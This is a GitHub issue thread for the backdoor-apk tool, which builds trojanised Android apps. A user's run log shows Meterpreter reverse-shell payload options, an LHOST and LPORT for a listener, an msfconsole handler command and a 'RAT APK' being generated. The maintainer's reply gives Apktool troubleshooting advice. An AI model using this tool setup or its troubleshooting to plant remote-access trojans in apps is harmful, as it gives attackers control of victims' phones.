### ISSUE TITLE
Failed to decompile original APK file

### ISSUE THREAD

**Issue by wongcheehong** [dana-at-cp/backdoor-apk#82]
Why I getting this error? Please help!
[*] Running backdoor-apk.sh v0.2.0 on Thu Feb  9 10:13:29 EST 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 192.168.1.150
[?] Please enter an LPORT value: 7777
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[!] Failed to decompile original APK file
[run.log.txt](https://github.com/dana-at-cp/backdoor-apk/files/790267/run.log.txt)

**Comment by dana-at-cp** [comment]
@wongcheehong Read up on Apktool. You have to have proper framework files for Apktool to process certain APKs such as the one you are trying to use in this particular case.

```
W: Could not decode attr value, using undecoded value instead: ns=android, name=paddingEnd, value=0x100a000c
W: Could not decode attr value, using undecoded value instead: ns=android, name=textAppearance, value=0x100d0072
W: Could not decode attr value, using undecoded value instead: ns=android, name=src, value=0x10020068
W: Could not decode attr value, using undecoded value instead: ns=android, name=layout_marginStart, value=0x100a000c
W: Could not decode attr value, using undecoded value instead: ns=android, name=textAppearance, value=0x100d005f
W: Could not decode attr value, using undecoded value instead: ns=android, name=textAppearance, value=0x100d0058
I: Decoding values */* XMLs...
Can't find framework resources for package of id: 16. You must install proper framework files, see project website for more info.
```
